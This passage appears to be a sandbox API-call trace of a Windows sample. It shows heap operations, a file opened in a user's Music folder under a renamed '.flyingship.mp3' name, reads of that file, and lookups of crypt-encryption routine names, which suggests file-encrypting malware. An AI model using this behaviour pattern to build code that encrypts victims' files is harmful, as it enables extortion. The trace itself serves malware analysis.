hHeap=0x8a0000) returned 1 [0188.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0188.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0188.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0188.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0188.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0188.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0188.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0188.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0188.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0188.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0188.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0188.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0188.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0188.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0188.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0188.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0188.175] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0188.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0188.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0188.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0188.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0188.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0188.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0188.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0188.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.176] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.flyingship.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rpbhryzip5cjl.flyingship.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0188.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0188.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0188.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0188.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0188.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0188.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0188.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.177] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0188.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0188.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0188.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0188.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0188.178] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0188.178] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0188.178] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0188.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0188.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0188.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0188.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0188.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0188.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0188.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0188.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0188.179] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0188.179] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0188.183] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x4415, lpOverlapped=0x0) returned 1 [0188.183] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0188.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0188.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0188.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0188.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14415) returned 0xbea018 [0188.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0188.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0188.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0188.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0188.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14415) returned 0xa5f008 [0188.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0188.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.187] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0188.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0188.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0188.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14415) returned 0xbea018 [0188.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0188.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0188.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0188.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.188] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0188.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0188.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0188.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0188.188] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0188.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0188.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0188.188] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0188.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0188.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0188.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27d8 [0188.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14415) returned 0xbea018 [0188.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28a8 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0188.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2758 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0188.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0188.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14415) returned 0xa73428 [0188.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0188.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0188.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0188.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0188.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0188.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0188.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0188.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0188.191] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0188.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0188.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0188.191] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0188.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0188.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.192] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0188.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27b8 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0188.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0188.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.192] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0188.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0188.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0188.193] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0188.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0188.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0188.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0188.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0188.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0188.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0188.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0188.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | 